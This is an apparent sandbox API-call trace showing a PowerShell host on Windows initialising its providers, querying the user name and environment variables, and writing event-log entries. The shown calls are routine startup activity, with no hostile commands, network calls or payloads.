	[0609.785] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0609.785] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0609.786] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ece00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0609.786] SetErrorMode (uMode=0x1) returned 0x1
	[0609.786] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ed060 | out: lpFileInformation=0x1ed060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0609.786] SetErrorMode (uMode=0x1) returned 0x1
	[0609.786] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ece00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0609.786] SetErrorMode (uMode=0x1) returned 0x1
	[0609.787] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ed060 | out: lpFileInformation=0x1ed060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0609.787] SetErrorMode (uMode=0x1) returned 0x1
	[0609.787] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecea0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0609.787] SetErrorMode (uMode=0x1) returned 0x1
	[0609.787] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ed100 | out: lpFileInformation=0x1ed100*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0609.787] SetErrorMode (uMode=0x1) returned 0x1
	[0609.788] CoTaskMemAlloc (cb=0x804) returned 0x1b9d75b0
	[0609.788] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9d75b0, nSize=0x1ed508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed508) returned 0x1
	[0609.788] CoTaskMemFree (pv=0x1b9d75b0) 
	[0609.788] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.788] GetUserNameW (in: lpBuffer=0x3a21e0, pcbBuffer=0x1ed548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed548) returned 1
	[0609.789] CoTaskMemFree (pv=0x3a21e0) 
	[0609.789] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f853f0*="FileSystem", lpRawData=0x2f85180) returned 1
	[0609.791] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0609.791] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.791] CoTaskMemFree (pv=0x409f00) 
	[0609.792] CoTaskMemAlloc (cb=0x804) returned 0x1b9d75b0
	[0609.792] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9d75b0, nSize=0x1ed508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed508) returned 0x1
	[0609.792] CoTaskMemFree (pv=0x1b9d75b0) 
	[0609.793] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.793] GetUserNameW (in: lpBuffer=0x3a21e0, pcbBuffer=0x1ed548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed548) returned 1
	[0609.793] CoTaskMemFree (pv=0x3a21e0) 
	[0609.793] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f8ac30*="Function", lpRawData=0x2f8a9c0) returned 1
	[0609.794] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0609.794] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.794] CoTaskMemFree (pv=0x409f00) 
	[0610.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0610.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0610.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0610.752] CoTaskMemAlloc (cb=0x804) returned 0x1b9d75b0
	[0610.752] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9d75b0, nSize=0x1ed508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed508) returned 0x1
	[0610.753] CoTaskMemFree (pv=0x1b9d75b0) 
	[0610.753] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0610.753] GetUserNameW (in: lpBuffer=0x3a21e0, pcbBuffer=0x1ed548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed548) returned 1
	[0610.753] CoTaskMemFree (pv=0x3a21e0) 
	[0610.754] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fad458*="Registry", lpRawData=0x2fad1e8) returned 1
	[0611.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.647] CoTaskMemAlloc (cb=0x804) returned 0x1b9d75b0
	[0611.647] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9d75b0, nSize=0x1ed508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed508) returned 0x1
	[0611.648] CoTaskMemFree (pv=0x1b9d75b0) 
	[0611.648] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0611.648] GetUserNameW (in: lpBuffer=0x3a21e0, pcbBuffer=0x1ed548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed548) returned 1
	[0611.648] CoTaskMemFree (pv=0x3a21e0) 
	[0611.649] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fb2870*="Variable", lpRawData=0x2fb2600) returned 1
	[0611.682] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0611.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0611.682] CoTaskMemFree (pv=0x409f00) 
	[0611.685] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0611.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0611.685] CoTaskMemFree (pv=0x409f00) 
	[0611.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0611.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0611.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0611.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0612.713] CoTaskMemAlloc (cb=0x804) returned 0x1b9e1020
	[0612.713] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9e1020, nSize=0x1ed508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed508) returned 0x1
	[0612.714] CoTaskMemFree (pv=0x1b9e1020) 
	[0612.714] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0612.714] GetUserNameW (in: lpBuffer=0x3a21e0, pcbBuffer=0x1ed548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed548) returned 1
	[0612.714] CoTaskMemFree (pv=0x3a21e0) 
	[0612.715] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fc6488*="Certificate", lpRawData=0x2fc6218) returned 1
	[0613.171] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0613.171] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.171] CoTaskMemFree (pv=0x409f00) 
	[0613.175] GetLogicalDrives () returned 0x4
	[0613.175] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ed190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0613.175] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0613.176] CoTaskMemAlloc (cb=0x20e) returned 0x3fb4c0
	[0613.176] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3fb4c0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0613.176] CoTaskMemFree (pv=0x3fb4c0) 
	[0613.178] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0613.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.178] CoTaskMemFree (pv=0x409f00) 
	[0613.178] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0613.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.178] CoTaskMemFree (pv=0x409f00) 
	[0613.195] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0613.195] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.195] CoTaskMemFree (pv=0x409f00) 
	[0613.196] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0613.196] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.196] CoTaskMemFree (pv=0x409f00) 
	[0613.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0613.197] SetErrorMode (uMode=0x1) returned 0x1
	[0613.197] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ed150 | out: lpFileInformation=0x1ed150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0613.197] SetErrorMode (uMode=0x1) returned 0x1
	[0613.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0613.197] SetErrorMode (uMode=0x1) returned 0x1
	[0613.198] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ed150 | out: lpFileInformation=0x1ed150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0613.198] SetErrorMode (uMode=0x1) returned 0x1
	[0613.198] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0613.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.198] CoTaskMemFree (pv=0x409f00) 
	[0613.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ed090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0613.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ed1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0613.206] SetErrorMode (uMode=0x1) returned 0x1
	[0613.206] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ed410 | out: lpFileInformation=0x1ed410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0613.206] SetErrorMode (uMode=0x1) returned 0x1
	[0614.345] CoTaskMemAlloc (cb=0x804) returned 0x1b9e1020
	[0614.345] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9e1020, nSize=0x1ed778 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed778) returned 0x1
	[0615.204] CoTaskMemFree (pv=0x1b9e1020) 
	[0615.204] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0615.205] GetUserNameW (in: lpBuffer=0x3a21e0, pcbBuffer=0x1ed7b8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed7b8) returned 1
	[0615.205] CoTaskMemFree (pv=0x3a21e0) 
	[0615.206] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fff170*="Available", lpRawData=0x2ffef00) returned 1
	[0615.212] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0615.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0615.212] CoTaskMemFree (pv=0x409f00) 
	[0615.213] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0615.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0615.214] CoTaskMemFree (pv=0x409f00) 
	[0615.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.221] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0615.221] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0615.221] CoTaskMemFree (pv=0x409f00) 
	[0615.221] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0615.221] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0615.221] CoTaskMemFree (pv=0x409f00) 
	[0615.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.223] GetCurrentProcessId () returned 0xd28
	[0615.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
